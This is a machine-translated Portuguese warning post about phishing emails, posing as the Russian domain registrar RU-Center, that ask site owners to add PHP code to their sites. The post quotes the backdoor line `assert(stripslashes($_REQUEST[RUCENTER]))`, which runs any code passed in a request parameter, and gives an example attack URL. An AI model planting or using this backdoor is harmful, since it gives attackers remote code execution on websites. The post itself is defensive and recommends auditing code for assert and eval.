Atenção aos "webmasters" que não conhecem PHP. Vulnerabilidade.

Esta é uma tradução automática.
Clique aqui para ler a publicação no idioma original.

Hoje, alguns dos meus amigos receberam cartas, supostamente do RU-Center (o maior registrador de nomes de domínio da Rússia) - nic.ru , com o seguinte conteúdo:

As cartas foram enviadas de info@nic.technical . Na carta, os atacantes, que se representam em nome do RU-Center, sugerem colocar o seguinte código no site:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Infelizmente, muitos de nossos colegas, que se autodenominam "webmasters" (vários proprietários de sites), não conhecem PHP e não pensam nos perigos do código acima. Se você passar uma string como parâmetro para esta função, ela será considerada por assert () como código PHP! Cuidado!

Eu recomendo que você inspecione seus projetos php para vulnerabilidades usando os comandos assert ou eval. Se esses comandos estiverem presentes no código do projeto, não entre em pânico - estude o algoritmo deles. O uso autorizado de algoritmos é perfeitamente possível. No caso do exemplo acima, o comando permitirá que invasores chamem seu site, por exemplo, usando o parâmetro RUCENTER - http://sistema-audit.ru/?RUCENTER=PHP-code

Recomendamos que você faça uma pesquisa usando, por exemplo, o comando linux grep -i -r 'assert' / home / www / mysite / * indicando a pasta com os arquivos do site para obter uma lista de arquivos nos quais os suspeitos instância é o código usado.

Cuide de você e de seus sites!

Esta é uma tradução automática.
Clique aqui para ler a publicação no idioma original.